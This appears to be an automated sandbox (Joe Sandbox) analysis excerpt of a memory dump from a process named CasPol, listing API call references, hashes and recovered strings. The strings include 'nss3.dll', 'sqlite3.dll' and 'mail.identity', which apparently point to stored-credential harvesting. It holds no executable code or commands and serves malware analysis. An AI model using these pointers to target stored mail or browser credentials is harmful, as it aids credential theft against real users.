                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                                                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1886415126-0
                                                                                                                                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                    • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                    • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                    • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: C@$mail.identity
                                                                                                                                                                                    • API String ID: 1439213657-721921413
                                                                                                                                                                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1479990042-0
                                                                                                                                                                                    • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                    • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                                                                                                    • String ID: Ul@
                                                                                                                                                                                    • API String ID: 270934217-715280498
                                                                                                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                    • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                    • API String ID: 3699762281-259020660
                                                                                                                                                                                    • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                    • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
APIs
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
Strings
• recovered %d pages from %s, xrefs: 004188B4
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
• String ID: recovered %d pages from %s
• API String ID: 985450955-1623757624
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _ultoasprintf
• String ID: %s %s %s
• API String ID: 432394123-3850900253
APIs
• memset.MSVCRT ref: 00409919
• SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: N\@
• API String ID: 568519121-3851889168
APIs
• LoadMenuA.USER32(00000000), ref: 00409078
• sprintf.MSVCRT ref: 0040909B
  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
• String ID: menu_%d
• API String ID: 1129539653-2417748251
APIs
Strings
• failed memory resize %u to %u bytes, xrefs: 00411706
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _msizerealloc
• String ID: failed memory resize %u to %u bytes
• API String ID: 2713192863-2134078882
APIs
  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
• strrchr.MSVCRT ref: 00409808
• _mbscat.MSVCRT ref: 0040981D
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: FileModuleName_mbscatstrrchr
• String ID: _lng.ini
• API String ID: 3334749609-1948609170
APIs
• _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
• _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscat$_mbscpystrlen
• String ID: sqlite3.dll
• API String ID: 1983510840-1155512374
APIs
• GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
• API String ID: 1096422788-4071850762
                                                                                                                                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                    • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                    • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3110682361-0
                                                                                                                                                                                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                    • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                    • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                    • free.MSVCRT ref: 0040799A
                                                                                                                                                                                      • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                      • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                      • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                    • free.MSVCRT ref: 004079BD
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                    • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                    • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                    • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                    • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59

Execution Graph

Execution Coverage: 13.8%
Dynamic/Decrypted Code Coverage: 4.2%
Signature Coverage: 2.7%
Total number of Nodes: 1726
Total number of Limit Nodes: 46
